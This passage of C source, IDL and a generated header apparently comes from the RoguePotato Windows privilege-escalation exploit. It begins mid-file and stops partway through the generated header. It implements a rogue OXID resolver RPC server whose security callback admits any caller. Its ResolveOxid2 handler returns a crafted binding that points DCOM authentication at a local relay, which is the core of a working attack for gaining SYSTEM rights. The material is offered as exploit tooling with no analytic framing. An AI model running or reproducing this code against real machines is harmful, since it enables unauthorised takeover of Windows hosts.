RPC_STATUS CALLBACK SecurityCallback(RPC_IF_HANDLE hInterface, void* pBindingHandle);

int RunRogueOxidResolver(char* listening_port) {
    RPC_STATUS status;
    RPC_BINDING_VECTOR* pbindingVector = 0;
    // Uses the protocol combined with the endpoint for receiving
    // remote procedure calls.
    const char* pszProtocolSequence = "ncacn_ip_tcp";
    const char* pszEndpoint = listening_port;
    unsigned char* pszSecurity = NULL;
    unsigned int cMaxCalls = 20;

    status = RpcServerUseProtseqEpA((RPC_CSTR)pszProtocolSequence, cMaxCalls, (RPC_CSTR)pszEndpoint, pszSecurity);
    if (status) {
        printf("[-] RpcServerUseProtseqEp() failed with status code %d\n", status);
        return (-1);
    }

    status = RpcServerRegisterIf2(
        IObjectExporter_v0_0_s_ifspec, // Interface to register.
        NULL, // Use the MIDL generated entry-point vector.
        NULL, // Use the MIDL generated entry-point vector.
        RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH, // Forces use of security callback.
        RPC_C_LISTEN_MAX_CALLS_DEFAULT, // Use default number of concurrent calls.
        (unsigned)-1, // Infinite max size of incoming data blocks.
        SecurityCallback); // Naive security callback
    if (status) {
        printf("[-] RpcServerRegisterIf2() failed with status code %d\n", status);
        return (-1);
    }

    status = RpcServerInqBindings(&pbindingVector);
    if (status) {
        printf("[-] RpcServerInqBindings() failed with status code %d\n", status);
        return (-1);
    }

    status = RpcServerRegisterAuthInfoA((RPC_CSTR)"",
        RPC_C_AUTHN_WINNT,
        NULL,
        NULL);
    if (status) {
        printf("[-] RpcServerRegisterAuthInfoA() failed with status code %d\n", status);
        return (-1);
    }

    status = RpcEpRegisterA(IObjectExporter_v0_0_s_ifspec,
        pbindingVector,
        0,
        (RPC_CSTR)"RoguePotato");
    if (status) {
        printf("[-] RpcEpRegister() failed with status code %d\n", status);
        return (-1);
    }

    printf("[*] Starting RogueOxidResolver RPC Server listening on port %s ... \n", pszEndpoint);

    // Start to listen for remote procedure calls for all registered interfaces.
    // This call will not return until RpcMgmtStopServerListening is called.
    status = RpcServerListen(
        1, // Recommended minimum number of threads.
        RPC_C_LISTEN_MAX_CALLS_DEFAULT, // Recommended maximum number of threads.
        FALSE); // Start listening now.
    if (status) {
        printf("[-] RpcServerListen() failed with status code %d\n", status);
        return (-1);
    }
    return 0;
}


error_status_t ResolveOxid(
    _In_ handle_t hRpc,
    _In_ OXID* pOxid,
    _In_ unsigned short cRequestedProtseqs,
    _In_ unsigned short arRequestedProtseqs[],
    _Out_ DUALSTRINGARRAY** ppdsaOxidBindings,
    _Out_ IPID* pipidRemUnknown,
    _Out_ DWORD* pAuthnHint)
{

    printf("[*] ResolveOxid RPC call\n");
    return RPC_S_OK;
}


error_status_t SimplePing
(
    handle_t hRpc,
    SETID* pSetId
)
{
    printf("[*] SimplePing RPC call\n");

    return RPC_S_OK;
}

error_status_t ComplexPing
(
    handle_t hRpc,
    SETID* pSetId,
    unsigned short SequenceNum,
    unsigned short cAddToSet,
    unsigned short cDelFromSet,
    OID AddToSet[],
    OID DelFromSet[],
    unsigned short* pPingBackoffFactor
)
{
    printf("[*] ComplexPing RPC call\n");
    return RPC_S_OK;
}

error_status_t ServerAlive
(
    handle_t hRpc
)
{
    printf("[*] ServerAlive RPC call\n");
    return RPC_S_OK;
}

error_status_t ResolveOxid2
(
    handle_t hRpc,
    OXID* pOxid,
    unsigned short cRequestedProtseqs,
    unsigned short arRequestedProtseqs[],
    DUALSTRINGARRAY** ppdsaOxidBindings,
    IPID* pipidRemUnknown,
    DWORD* pAuthnHint,
    COMVERSION* pComVersion
)
{
    size_t wcstombsOut;
    char endpoint[MAX_PATH];
    char port[10];
    memset(port, 0, 10);
    wcstombs_s(&wcstombsOut, port, 9, g_rpcRelayServerListeningPort, 9);

    printf("[*] ResolveOxid2 RPC call\n");
    *pAuthnHint = RPC_C_AUTHN_LEVEL_CONNECT;
    CLSIDFromString(OLESTR("{11111111-2222-3333-4444-555555555555}"), (CLSID*)pipidRemUnknown);
    sprintf_s(endpoint, MAX_PATH, "127.0.0.1[%s]", port);
    int endpoint_len = (int)strlen(endpoint) + 1;
    char principalName[] = "";
    int nEntries = (1 + endpoint_len + 1 + 2 + sizeof(principalName) + 1);
    int securityOffset = (1 + endpoint_len) + 1;
    COMVERSION outputCom;
    outputCom.MajorVersion = 5;
    outputCom.MinorVersion = 7;
    *pComVersion = outputCom;
    *ppdsaOxidBindings = (DUALSTRINGARRAY*)malloc(nEntries * sizeof(WCHAR) + sizeof(DUALSTRINGARRAY));
    (*ppdsaOxidBindings)->wNumEntries = nEntries;
    (*ppdsaOxidBindings)->wSecurityOffset = securityOffset;
    //(*ppdsaOxidBindings)->aStringArray[0] = 0x0F; //ncacn_np
    (*ppdsaOxidBindings)->aStringArray[0] = 0x07; //ncacn_ip_tcp
    int z = 0;
    for (int i = 1; i < endpoint_len + 1; i++) {
        (*ppdsaOxidBindings)->aStringArray[i] = (unsigned short)endpoint[z];
        z++;
    }
    (*ppdsaOxidBindings)->aStringArray[securityOffset - 1] = 0x00; // null byte separator between string bindings and security bindings
    (*ppdsaOxidBindings)->aStringArray[securityOffset] = RPC_C_AUTHN_WINNT;// 0x0a
    securityOffset++;
    (*ppdsaOxidBindings)->aStringArray[securityOffset] = 0xffff;
    securityOffset++;
    int j = 0;
    for (int i = securityOffset; i < nEntries - 1; i++) {
        (*ppdsaOxidBindings)->aStringArray[i] = (unsigned short)principalName[j];
        j++;
    }
    (*ppdsaOxidBindings)->aStringArray[nEntries] = 0;
    (*ppdsaOxidBindings)->aStringArray[nEntries - 1] = 0; //some magic fix again....
    return RPC_S_OK;
}


error_status_t ServerAlive2
(
    handle_t hRpc,
    COMVERSION* pComVersion,
    DUALSTRINGARRAY** ppdsaOrBindings,
    DWORD* pReserved
) {
    printf("[*] ServerAlive2 RPC Call\n");
    return RPC_S_OK;
}

RPC_STATUS CALLBACK SecurityCallback(RPC_IF_HANDLE hInterface, void* pBindingHandle)
{
    return RPC_S_OK; // Always allow anyone.
}

// Memory allocation function for RPC.
// The runtime uses these two functions for allocating/deallocating
// enough memory to pass the string to the server.
void* __RPC_USER midl_user_allocate(size_t size)
{
    return malloc(size);
}

// Memory deallocation function for RPC.
void __RPC_USER midl_user_free(void* p)
{
    free(p);
}

--------------------------------------------------------------------------------
/RogueOxidResolver.h:
--------------------------------------------------------------------------------
#pragma once
int RunRogueOxidResolver(char*);
--------------------------------------------------------------------------------
/RogueOxidResolver.idl:
--------------------------------------------------------------------------------
import "oaidl.idl";
import "ocidl.idl";

//source --> https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dcom/49aef5a4-f0ad-4478-abb5-cb9446dc13c6

typedef GUID CLSID;
typedef GUID IID;
typedef unsigned hyper ID;
typedef unsigned hyper OXID;

typedef unsigned hyper OID;
typedef unsigned hyper SETID;
typedef GUID IPID;
typedef GUID CID;

#define REFGUID const GUID *
#define REFIID const IID *

typedef REFGUID REFIPID;

const unsigned long MAX_REQUESTED_INTERFACES = 0x8000;
const unsigned long MAX_REQUESTED_PROTSEQS = 0x8000;

typedef struct tagCOMVERSION
{
    unsigned short MajorVersion;
    unsigned short MinorVersion;
} COMVERSION;

typedef struct tagORPC_EXTENT
{
    GUID id;
    unsigned long size;
    [size_is((size + 7) & ~7)] byte data[];
} ORPC_EXTENT;

typedef struct tagORPC_EXTENT_ARRAY
{
    unsigned long size;
    unsigned long reserved;
    [size_is((size + 1) & ~1, ), unique] ORPC_EXTENT** extent;
} ORPC_EXTENT_ARRAY;

typedef struct tagORPCTHIS
{
    COMVERSION version;
    unsigned long flags;
    unsigned long reserved1;
    CID cid;
    [unique] ORPC_EXTENT_ARRAY* extensions;
} ORPCTHIS;

typedef struct tagORPCTHAT
{
    unsigned long flags;
    [unique] ORPC_EXTENT_ARRAY* extensions;
} ORPCTHAT;

typedef struct tagDUALSTRINGARRAY
{
    unsigned short wNumEntries;
    unsigned short wSecurityOffset;
    [size_is(wNumEntries)] unsigned short aStringArray[];
} DUALSTRINGARRAY;

enum tagCPFLAGS
{
    CPFLAG_PROPAGATE = 0x1,
    CPFLAG_EXPOSE = 0x2,
    CPFLAG_ENVOY = 0x4,
};

typedef struct tagMInterfacePointer
{
    unsigned long ulCntData;
    [size_is(ulCntData)] byte abData[];
} MInterfacePointer;

typedef [unique] MInterfacePointer* PMInterfacePointer;

typedef struct tagErrorObjectData
{
    DWORD dwVersion;
    DWORD dwHelpContext;
    IID iid;
    [unique, string] wchar_t* pszSource;
    [unique, string] wchar_t* pszDescription;
    [unique, string] wchar_t* pszHelpFile;
} ErrorObjectData;


[
    uuid(99fcfec4-5260-101b-bbcb-00aa0021347a),
    pointer_default(unique)
]

interface IObjectExporter
{
    [idempotent] error_status_t ResolveOxid
    (
        [in] handle_t hRpc,
        [in] OXID* pOxid,
        [in] unsigned short cRequestedProtseqs,
        [in, ref, size_is(cRequestedProtseqs)]
        unsigned short arRequestedProtseqs[],
        [out, ref] DUALSTRINGARRAY** ppdsaOxidBindings,
        [out, ref] IPID* pipidRemUnknown,
        [out, ref] DWORD* pAuthnHint
    );

    [idempotent] error_status_t SimplePing
    (
        [in] handle_t hRpc,
        [in] SETID* pSetId
    );

    [idempotent] error_status_t ComplexPing
    (
        [in] handle_t hRpc,
        [in, out] SETID* pSetId,
        [in] unsigned short SequenceNum,
        [in] unsigned short cAddToSet,
        [in] unsigned short cDelFromSet,
        [in, unique, size_is(cAddToSet)] OID AddToSet[],
        [in, unique, size_is(cDelFromSet)] OID DelFromSet[],
        [out] unsigned short* pPingBackoffFactor
    );

    [idempotent] error_status_t ServerAlive
    (
        [in] handle_t hRpc
    );


    [idempotent] error_status_t ResolveOxid2
    (
        [in] handle_t hRpc,
        [in] OXID* pOxid,
        [in] unsigned short cRequestedProtseqs,
        [in, ref, size_is(cRequestedProtseqs)]
        unsigned short arRequestedProtseqs[],
        [out, ref] DUALSTRINGARRAY** ppdsaOxidBindings,
        [out, ref] IPID* pipidRemUnknown,
        [out, ref] DWORD* pAuthnHint,
        [out, ref] COMVERSION* pComVersion
    );

    [idempotent] error_status_t ServerAlive2
    (
        [in] handle_t hRpc,
        [out, ref] COMVERSION* pComVersion,
        [out, ref] DUALSTRINGARRAY** ppdsaOrBindings,
        [out, ref] DWORD* pReserved
    );
}

typedef struct tagSTDOBJREF
{
    unsigned long flags;
    unsigned long cPublicRefs;
    OXID oxid;
    OID oid;
    IPID ipid;
} STDOBJREF;

typedef struct tagREMQIRESULT
{
    HRESULT hResult;
    STDOBJREF std;
} REMQIRESULT;

typedef struct tagREMINTERFACEREF
{
    IPID ipid;
    unsigned long cPublicRefs;
    unsigned long cPrivateRefs;
} REMINTERFACEREF;

typedef [disable_consistency_check] REMQIRESULT* PREMQIRESULT;
typedef [disable_consistency_check] MInterfacePointer*
PMInterfacePointerInternal;

/*Already defined
[
    object,
    uuid(00000000-0000-0000-C000-000000000046),
    pointer_default(unique)
]
interface IUnknown
{
    HRESULT Opnum0NotUsedOnWire(void);
    HRESULT Opnum1NotUsedOnWire(void);
    HRESULT Opnum2NotUsedOnWire(void);
};*/

[
    object,
    uuid(00000131-0000-0000-C000-000000000046)
]
interface IRemUnknown : IUnknown
{
    HRESULT RemQueryInterface
    (
        [in] REFIPID ripid,
        [in] unsigned long cRefs,
        [in] unsigned short cIids,
        [in, size_is(cIids)] IID* iids,
        [out, size_is(, cIids)] PREMQIRESULT* ppQIResults
    );

    HRESULT RemAddRef
    (
        [in] unsigned short cInterfaceRefs,
        [in, size_is(cInterfaceRefs)] REMINTERFACEREF
        InterfaceRefs[],
        [out, size_is(cInterfaceRefs)] HRESULT* pResults
    );

    HRESULT RemRelease
    (
        [in] unsigned short cInterfaceRefs,
        [in, size_is(cInterfaceRefs)] REMINTERFACEREF
        InterfaceRefs[]
    );
}

[
    object,
    uuid(00000143-0000-0000-C000-000000000046)
]
interface IRemUnknown2 : IRemUnknown
{
    HRESULT RemQueryInterface2
    (
        [in] REFIPID ripid,
        [in] unsigned short cIids,
        [in, size_is(cIids)] IID* iids,
        [out, size_is(cIids)] HRESULT* phr,
        [out, size_is(cIids)] PMInterfacePointerInternal* ppMIF
    );
}

const unsigned long MIN_ACTPROP_LIMIT = 1;
const unsigned long MAX_ACTPROP_LIMIT = 10;

/*Already defined
typedef struct _COSERVERINFO
{
    DWORD dwReserved1;
    [string] wchar_t* pwszName;
    DWORD* pdwReserved;
    DWORD dwReserved2;
} COSERVERINFO;*/

typedef struct _customREMOTE_REQUEST_SCM_INFO
{
    DWORD ClientImpLevel;
    [range(0, MAX_REQUESTED_PROTSEQS)] unsigned short
    cRequestedProtseqs;
    [size_is(cRequestedProtseqs)]
    unsigned short* pRequestedProtseqs;
} customREMOTE_REQUEST_SCM_INFO;

typedef struct _customREMOTE_REPLY_SCM_INFO
{
    OXID Oxid;
    DUALSTRINGARRAY* pdsaOxidBindings;
    IPID ipidRemUnknown;
    DWORD authnHint;
    COMVERSION serverVersion;
} customREMOTE_REPLY_SCM_INFO;

typedef struct tagInstantiationInfoData
{
    CLSID classId;
    DWORD classCtx;
    DWORD actvflags;
    long fIsSurrogate;
    [range(1, MAX_REQUESTED_INTERFACES)] DWORD cIID;
    DWORD instFlag;
    [size_is(cIID)] IID* pIID;
    DWORD thisSize;
    COMVERSION clientCOMVersion;
} InstantiationInfoData;

typedef struct tagLocationInfoData
{
    [string] wchar_t* machineName;
    DWORD processId;
    DWORD apartmentId;
    DWORD contextId;
} LocationInfoData;

typedef struct tagActivationContextInfoData
{
    long clientOK;
    long bReserved1;
    DWORD dwReserved1;
    DWORD dwReserved2;
    MInterfacePointer* pIFDClientCtx;
    MInterfacePointer* pIFDPrototypeCtx;
} ActivationContextInfoData;

typedef struct tagCustomHeader
{
    DWORD totalSize;
    DWORD headerSize;
    DWORD dwReserved;
    DWORD destCtx;
    [range(MIN_ACTPROP_LIMIT, MAX_ACTPROP_LIMIT)] DWORD cIfs;
    CLSID classInfoClsid;
    [size_is(cIfs)] CLSID* pclsid;
    [size_is(cIfs)] DWORD* pSizes;
    DWORD* pdwReserved;
} CustomHeader;

typedef struct tagPropsOutInfo
{
    [range(1, MAX_REQUESTED_INTERFACES)] DWORD cIfs;
    [size_is(cIfs)] IID* piid;
    [size_is(cIfs)] HRESULT* phresults;
    [size_is(cIfs)] MInterfacePointer** ppIntfData;
} PropsOutInfo;

typedef struct tagSecurityInfoData
{
    DWORD dwAuthnFlags;
    COSERVERINFO* pServerInfo;
    DWORD* pdwReserved;
} SecurityInfoData;

typedef struct tagScmRequestInfoData
{
    DWORD* pdwReserved;
    customREMOTE_REQUEST_SCM_INFO* remoteRequest;
} ScmRequestInfoData;

typedef struct tagScmReplyInfoData
{
    DWORD* pdwReserved;
    customREMOTE_REPLY_SCM_INFO* remoteReply;
} ScmReplyInfoData;

typedef struct tagInstanceInfoData
{
    [string] wchar_t* fileName;
    DWORD mode;
    MInterfacePointer* ifdROT;
    MInterfacePointer* ifdStg;
} InstanceInfoData;

typedef enum
{
    SPD_FLAG_USE_CONSOLE_SESSION = 0x00000001,
    SPD_FLAG_USE_DEFAULT_AUTHN_LVL = 0x00000002,
} SPD_FLAGS;

typedef struct tagSpecialPropertiesData
{
    unsigned long dwSessionId;
    long fRemoteThisSessionId;
    long fClientImpersonating;
    long fPartitionIDPresent;
    DWORD dwDefaultAuthnLvl;
    GUID guidPartition;
    DWORD dwPRTFlags;
    DWORD dwOrigClsctx;
    DWORD dwFlags;
    DWORD Reserved1;
    unsigned __int64 Reserved2;
    DWORD Reserved3[5];
} SpecialPropertiesData;

typedef struct tagSpecialPropertiesData_Alternate
{
    unsigned long dwSessionId;
    long fRemoteThisSessionId;
    long fClientImpersonating;
    long fPartitionIDPresent;
    DWORD dwDefaultAuthnLvl;
    GUID guidPartition;
    DWORD dwPRTFlags;
    DWORD dwOrigClsctx;
    DWORD dwFlags;
    DWORD Reserved3[8];
} SpecialPropertiesData_Alternate;
--------------------------------------------------------------------------------
/RogueOxidResolver_h.h:
--------------------------------------------------------------------------------


/* this ALWAYS GENERATED file contains the definitions for the interfaces */


/* File created by MIDL compiler version 8.01.0622 */
/* at Tue Jan 19 04:14:07 2038
 */
/* Compiler settings for RogueOxidResolver.idl:
    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
    protocol : all , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data
    VC __declspec() decoration level:
         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */



/* verify that the version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 500
#endif

#include "rpc.h"
#include "rpcndr.h"

#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif /* __RPCNDR_H_VERSION__ */

#ifndef COM_NO_WINDOWS_H
#include "windows.h"
#include "ole2.h"
#endif /*COM_NO_WINDOWS_H*/

#ifndef __RogueOxidResolver_h_h__
#define __RogueOxidResolver_h_h__

#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif

/* Forward Declarations */

#ifndef __IRemUnknown_FWD_DEFINED__
#define __IRemUnknown_FWD_DEFINED__
typedef interface IRemUnknown IRemUnknown;

#endif /* __IRemUnknown_FWD_DEFINED__ */


#ifndef __IRemUnknown2_FWD_DEFINED__
#define __IRemUnknown2_FWD_DEFINED__
typedef interface IRemUnknown2 IRemUnknown2;

#endif /* __IRemUnknown2_FWD_DEFINED__ */


/* header files for imported files */
#include "oaidl.h"
#include "ocidl.h"

#ifdef __cplusplus
extern "C"{
#endif


/* interface __MIDL_itf_RogueOxidResolver_0000_0000 */
/* [local] */

typedef GUID CLSID;

typedef GUID IID;

typedef MIDL_uhyper ID;

typedef MIDL_uhyper OXID;

typedef MIDL_uhyper OID;

typedef MIDL_uhyper SETID;

typedef GUID IPID;

typedef GUID CID;

typedef const GUID *REFIPID;

#define MAX_REQUESTED_INTERFACES ( 0x8000 )

#define MAX_REQUESTED_PROTSEQS ( 0x8000 )

typedef struct tagCOMVERSION
    {
    unsigned short MajorVersion;
    unsigned short MinorVersion;
    } COMVERSION;

typedef struct tagORPC_EXTENT
    {
    GUID id;
    unsigned long size;
    /* [size_is] */ byte data[ 1 ];
    } ORPC_EXTENT;

typedef struct tagORPC_EXTENT_ARRAY
    {
    unsigned long size;
    unsigned long reserved;
    /* [unique][size_is][size_is] */ ORPC_EXTENT **extent;
    } ORPC_EXTENT_ARRAY;

typedef struct tagORPCTHIS
    {
    COMVERSION version;
    unsigned long flags;
    unsigned long reserved1;
    CID cid;
    /* [unique] */ ORPC_EXTENT_ARRAY *extensions;
    } ORPCTHIS;

typedef struct tagORPCTHAT
    {
    unsigned long flags;
    /* [unique] */ ORPC_EXTENT_ARRAY *extensions;
    } ORPCTHAT;

typedef struct tagDUALSTRINGARRAY
    {
    unsigned short wNumEntries;
    unsigned short wSecurityOffset;
    /* [size_is] */ unsigned short aStringArray[ 1 ];
    } DUALSTRINGARRAY;


enum tagCPFLAGS
    {
        CPFLAG_PROPAGATE = 0x1,
        CPFLAG_EXPOSE = 0x2,
        CPFLAG_ENVOY = 0x4
    } ;
typedef struct tagMInterfacePointer
    {
    unsigned long ulCntData;
    /* [size_is] */ byte abData[ 1 ];
    } MInterfacePointer;

typedef /* [unique] */ MInterfacePointer *PMInterfacePointer;

typedef struct tagErrorObjectData
    {
    DWORD dwVersion;
    DWORD dwHelpContext;
    IID iid;
    /* [string][unique] */ wchar_t *pszSource;
    /* [string][unique] */ wchar_t *pszDescription;
    /* [string][unique] */ wchar_t *pszHelpFile;
    } ErrorObjectData;



extern RPC_IF_HANDLE __MIDL_itf_RogueOxidResolver_0000_0000_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_RogueOxidResolver_0000_0000_v0_0_s_ifspec;

#ifndef __IObjectExporter_INTERFACE_DEFINED__
#define __IObjectExporter_INTERFACE_DEFINED__

/* interface IObjectExporter */
/* [unique][uuid] */

/* [idempotent] */ error_status_t ResolveOxid(
    /* [in] */ handle_t hRpc,
    /* [in] */ OXID *pOxid,
    /* [in] */ unsigned short cRequestedProtseqs,
    /* [size_is][ref][in] */ unsigned short arRequestedProtseqs[ ],
    /* [ref][out] */ DUALSTRINGARRAY **ppdsaOxidBindings,
    /* [ref][out] */ IPID *pipidRemUnknown,
    /* [ref][out] */ DWORD *pAuthnHint);

/* [idempotent] */ error_status_t SimplePing(
    /* [in] */ handle_t hRpc,
    /* [in] */ SETID *pSetId);

/* [idempotent] */ error_status_t ComplexPing(
    /* [in] */ handle_t hRpc,
    /* [out][in] */ SETID *pSetId,
    /* [in] */ unsigned short SequenceNum,
    /* [in] */ unsigned short cAddToSet,
    /* [in] */ unsigned short cDelFromSet,
    /* [size_is][unique][in] */ OID AddToSet[ ],
    /* [size_is][unique][in] */ OID DelFromSet[ ],
    /* [out] */ unsigned short *pPingBackoffFactor);

/* [idempotent] */ error_status_t ServerAlive(
    /* [in] */ handle_t hRpc);

/* [idempotent] */ error_status_t ResolveOxid2(
    /* [in] */ handle_t hRpc,
    /* [in] */ OXID *pOxid,
    /* [in] */ unsigned short cRequestedProtseqs,
    /* [size_is][ref][in] */ unsigned short arRequestedProtseqs[ ],
    /* [ref][out] */ DUALSTRINGARRAY **ppdsaOxidBindings,
    /* [ref][out] */ IPID *pipidRemUnknown,
    /* [ref][out] */ DWORD *pAuthnHint,
    /* [ref][out] */ COMVERSION *pComVersion);

/* [idempotent] */ error_status_t ServerAlive2(
    /* [in] */ handle_t hRpc,
    /* [ref][out] */ COMVERSION *pComVersion,
    /* [ref][out] */ DUALSTRINGARRAY **ppdsaOrBindings,
    /* [ref][out] */ DWORD *pReserved);



extern RPC_IF_HANDLE IObjectExporter_v0_0_c_ifspec;
extern RPC_IF_HANDLE IObjectExporter_v0_0_s_ifspec;
#endif /* __IObjectExporter_INTERFACE_DEFINED__ */

/* interface __MIDL_itf_RogueOxidResolver_0000_0001 */
/* [local] */

typedef struct tagSTDOBJREF
    {
    unsigned long flags;
    unsigned long cPublicRefs;
    OXID oxid;
    OID oid;
    IPID ipid;
    } STDOBJREF;

typedef struct tagREMQIRESULT
    {
    HRESULT hResult;
    STDOBJREF std;
    } REMQIRESULT;

typedef struct tagREMINTERFACEREF
    {
    IPID ipid;
    unsigned long cPublicRefs;
    unsigned long cPrivateRefs;
    } REMINTERFACEREF;

typedef /* [disable_consistency_check] */ REMQIRESULT *PREMQIRESULT;

typedef /* [disable_consistency_check] */ MInterfacePointer *PMInterfacePointerInternal;



extern RPC_IF_HANDLE __MIDL_itf_RogueOxidResolver_0000_0001_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_RogueOxidResolver_0000_0001_v0_0_s_ifspec;

#ifndef __IRemUnknown_INTERFACE_DEFINED__
#define __IRemUnknown_INTERFACE_DEFINED__

/* interface IRemUnknown */
/* [uuid][object] */


EXTERN_C const IID IID_IRemUnknown;

#if defined(__cplusplus) && !defined(CINTERFACE)

    MIDL_INTERFACE("00000131-0000-0000-C000-000000000046")
    IRemUnknown : public IUnknown
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE RemQueryInterface(
            /* [in] */ REFIPID ripid,
            /* [in] */ unsigned long cRefs,
            /* [in] */ unsigned short cIids,
            /* [size_is][in] */ IID *iids,
            /* [size_is][size_is][out] */ PREMQIRESULT *ppQIResults) = 0;

        virtual HRESULT STDMETHODCALLTYPE RemAddRef(
            /* [in] */ unsigned short cInterfaceRefs,
            /* [size_is][in] */ REMINTERFACEREF InterfaceRefs[ ],
            /* [size_is][out] */ HRESULT *pResults) = 0;

        virtual HRESULT STDMETHODCALLTYPE RemRelease(
            /* [in] */ unsigned short cInterfaceRefs,
            /* [size_is][in] */ REMINTERFACEREF InterfaceRefs[ ]) = 0;

    };


#else /* C style interface */

    typedef struct IRemUnknownVtbl
    {
        BEGIN_INTERFACE

        HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
            IRemUnknown * This,
            /* [in] */ REFIID riid,
            /* [annotation][iid_is][out] */
            _COM_Outptr_ void **ppvObject);

        ULONG ( STDMETHODCALLTYPE *AddRef )(
            IRemUnknown * This);

        ULONG ( STDMETHODCALLTYPE *Release )(
            IRemUnknown * This);

        HRESULT ( STDMETHODCALLTYPE *RemQueryInterface )(
            IRemUnknown * This,
            /* [in] */ REFIPID ripid,
            /* [in] */ unsigned long cRefs,
            /* [in] */ unsigned short cIids,
            /* [size_is][in] */ IID *iids,
            /* [size_is][size_is][out] */ PREMQIRESULT *ppQIResults);

        HRESULT ( STDMETHODCALLTYPE *RemAddRef )(
            IRemUnknown * This,
            /* [in] */ unsigned short cInterfaceRefs,
            /* [size_is][in] */ REMINTERFACEREF InterfaceRefs[ ],
            /* [size_is][out] */ HRESULT *pResults);

        HRESULT ( STDMETHODCALLTYPE *RemRelease )(
            IRemUnknown * This,
            /* [in] */ unsigned short cInterfaceRefs,
            /* [size_is][in] */ REMINTERFACEREF InterfaceRefs[ ]);

        END_INTERFACE
    } IRemUnknownVtbl;

    interface IRemUnknown
    {
        CONST_VTBL struct IRemUnknownVtbl *lpVtbl;
    };



#ifdef COBJMACROS


#define IRemUnknown_QueryInterface(This,riid,ppvObject) \
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) )

#define IRemUnknown_AddRef(This) \
    ( (This)->lpVtbl -> AddRef(This) )

#define IRemUnknown_Release(This) \
    ( (This)->lpVtbl -> Release(This) )


#define IRemUnknown_RemQueryInterface(This,ripid,cRefs,cIids,iids,ppQIResults) \
    ( (This)->lpVtbl -> RemQueryInterface(This,ripid,cRefs,cIids,iids,ppQIResults) )

#define IRemUnknown_RemAddRef(This,cInterfaceRefs,InterfaceRefs,pResults) \
    ( (This)->lpVtbl -> RemAddRef(This,cInterfaceRefs,InterfaceRefs,pResults) )

#define IRemUnknown_RemRelease(This,cInterfaceRefs,InterfaceRefs) \
    ( (This)->lpVtbl -> RemRelease(This,cInterfaceRefs,InterfaceRefs) )

#endif /* COBJMACROS */


#endif /* C style interface */




#endif /* __IRemUnknown_INTERFACE_DEFINED__ */


#ifndef __IRemUnknown2_INTERFACE_DEFINED__
#define __IRemUnknown2_INTERFACE_DEFINED__

/* interface IRemUnknown2 */
/* [uuid][object] */


EXTERN_C const IID IID_IRemUnknown2;

#if defined(__cplusplus) && !defined(CINTERFACE)

    MIDL_INTERFACE("00000143-0000-0000-C000-000000000046")
    IRemUnknown2 : public IRemUnknown
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE RemQueryInterface2(
            /* [in] */ REFIPID ripid,
            /* [in] */ unsigned short cIids,
            /* [size_is][in] */ IID *iids,
            /* [size_is][out] */ HRESULT *phr,
            /* [size_is][out] */ PMInterfacePointerInternal *ppMIF) = 0;

    };


#else /* C style interface */

    typedef struct IRemUnknown2Vtbl
    {
        BEGIN_INTERFACE

        HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
            IRemUnknown2 * This,
            /* [in] */ REFIID riid,
            /* [annotation][iid_is][out] */
            _COM_Outptr_ void **ppvObject);

        ULONG ( STDMETHODCALLTYPE *AddRef )(
            IRemUnknown2 * This);

        ULONG ( STDMETHODCALLTYPE *Release )(
            IRemUnknown2 * This);

        HRESULT ( STDMETHODCALLTYPE *RemQueryInterface )(
            IRemUnknown2 * This,
            /* [in] */ REFIPID ripid,
            /* [in] */ unsigned long cRefs,
            /* [in] */ unsigned short cIids,
            /* [size_is][in] */ IID *iids,
            /* [size_is][size_is][out] */ PREMQIRESULT *ppQIResults);

        HRESULT ( STDMETHODCALLTYPE *RemAddRef )(
            IRemUnknown2 * This,
            /* [in] */ unsigned short cInterfaceRefs,
            /* [size_is][in] */ REMINTERFACEREF InterfaceRefs[ ],
            /* [size_is][out] */ HRESULT *pResults);

        HRESULT ( STDMETHODCALLTYPE *RemRelease )(
            IRemUnknown2 * This,
            /* [in] */ unsigned short cInterfaceRefs,
            /* [size_is][in] */ REMINTERFACEREF InterfaceRefs[ ]);

        HRESULT ( STDMETHODCALLTYPE *RemQueryInterface2 )(
            IRemUnknown2 * This,
            /* [in] */ REFIPID ripid,
            /* [in] */ unsigned short cIids,
            /* [size_is][in] */ IID *iids,
            /* [size_is][out] */ HRESULT *phr,
            /* [size_is][out] */ PMInterfacePointerInternal *ppMIF);

        END_INTERFACE
    } IRemUnknown2Vtbl;

    interface IRemUnknown2
    {
        CONST_VTBL struct IRemUnknown2Vtbl *lpVtbl;
    };



#ifdef COBJMACROS


#define IRemUnknown2_QueryInterface(This,riid,ppvObject) \
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) )

#define IRemUnknown2_AddRef(This) \
    ( (This)->lpVtbl -> AddRef(This) )

#define IRemUnknown2_Release(This) \
    ( (This)->lpVtbl -> Release(This) )


#define IRemUnknown2_RemQueryInterface(This,ripid,cRefs,cIids,iids,ppQIResults) \
    ( (This)->lpVtbl -> RemQueryInterface(This,ripid,cRefs,cIids,iids,ppQIResults) )

#define IRemUnknown2_RemAddRef(This,cInterfaceRefs,InterfaceRefs,pResults) \
    ( (This)->lpVtbl -> RemAddRef(This,cInterfaceRefs,InterfaceRefs,pResults) )

#define IRemUnknown2_RemRelease(This,cInterfaceRefs,InterfaceRefs) \
    ( (This)->lpVtbl -> RemRelease(This,cInterfaceRefs,InterfaceRefs) )


#define IRemUnknown2_RemQueryInterface2(This,ripid,cIids,iids,phr,ppMIF) \
    ( (This)->lpVtbl -> RemQueryInterface2(This,ripid,cIids,iids,phr,ppMIF) )

#endif /* COBJMACROS */


#endif /* C style interface */




